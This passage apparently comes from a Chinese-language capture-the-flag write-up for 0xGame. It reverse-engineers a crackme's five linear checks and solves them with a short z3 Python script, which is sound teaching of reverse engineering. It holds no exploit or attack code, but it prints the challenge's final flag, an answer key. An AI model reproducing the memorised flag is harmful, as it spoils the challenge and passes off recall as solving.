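    || (v5 = (char *)unk_1400032B8, v8 + 7 * v11 + 8 * (v9 + v10) + 5 * v7 != 0x1935EBA54EB28i64) )
  {
    v5 = (char *)byte_1400032D8;               /* failure message */
  }
  sub_140001020(v5);
  system("pause");
  return 0;
}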
这里符号表都被删掉了，只能从函数的参数猜测函数功能。flag 由 5 个 16 进制数组成（%16llx），这些数要同时满足下面的 5 个线性等式。
z3 也是绕不过去了。（原文里等式中的加号丢失了，下面已经补回，用解出来的值代回可以验证。）
7 * v9 + 5 * (v8 + v11) + 2 * (v10 + 4 * v7) != 0x12021DE669FC2i64)
|| (v4 = v9 + v10 + 2 * v10 + 2 * (v11 + v7), v8 + 2 * v4 + v4 != 0x159BFFC17D045i64)
|| v10 + v9 + v11 + 2 * v9 + 2 * (v9 + v11 + 2 * v9) + 2 * (v8 + 4 * v7) != 0xACE320D12501i64
|| v8 + 2 * (v7 + v11 + v9 + 2 * v10) != 0x733FFEB3A4FAi64
|| (v5 = (char *)unk_1400032B8, v8 + 7 * v11 + 8 * (v9 + v10) + 5 * v7 != 0x1935EBA54EB28i64) )
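def constraints(v7, v8, v9, v10, v11):
    """The five equalities main() checks, as (lhs, rhs) pairs.

    Pure arithmetic, so it works both on plain ints (to verify a candidate) and
    on z3 Int terms (to solve).  Every operator between terms is '+'.
    """
    v4 = v9 + v10 + 2 * v10 + 2 * (v11 + v7)
    return [
        (7 * v9 + 5 * (v8 + v11) + 2 * (v10 + 4 * v7), 0x12021DE669FC2),
        (v8 + 2 * v4 + v4, 0x159BFFC17D045),
        (v10 + v9 + v11 + 2 * v9 + 2 * (v9 + v11 + 2 * v9) + 2 * (v8 + 4 * v7), 0xACE320D12501),
        (v8 + 2 * (v7 + v11 + v9 + 2 * v10), 0x733FFEB3A4FA),
        (v8 + 7 * v11 + 8 * (v9 + v10) + 5 * v7, 0x1935EBA54EB28),
    ]


def solve():
    """Solve the system with z3 and return [v7, v8, v9, v10, v11].

    Raises RuntimeError if z3 reports the system unsatisfiable.  NOTE: the binary
    compares 64-bit values while z3 Ints are unbounded; the solution below is
    small enough that wrap-around never comes into play.
    """
    from z3 import Ints, Solver, sat

    v7, v8, v9, v10, v11 = Ints("v7 v8 v9 v10 v11")
    s = Solver()
    for lhs, rhs in constraints(v7, v8, v9, v10, v11):
        s.add(lhs == rhs)
    if s.check() != sat:
        raise RuntimeError("no solution")
    d = s.model()
    return [d[v].as_long() for v in (v7, v8, v9, v10, v11)]


def to_flag(values):
    """Format the five numbers the way sscanf("0xGame{%16llx-...}") reads them."""
    return "0xGame{" + "-".join(hex(v)[2:] for v in values) + "}"


# What the solver returned:
#   v7 = 2693650760, v8 = 14810, v9 = 16488, v10 = 41791, v11 = 63356652901730
SOLUTION = [2693650760, 14810, 16488, 41791, 63356652901730]

if __name__ == "__main__":
    print(to_flag(solve()))
# 0xGame{a08dd948-39da-4068-a33f-399f5eca5562}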
还是写的晚了到这web和misc的题都看不到了。反正这块也不是本行题都是一点点搜着网上的例子作。都是入门题网上都能搜着作法。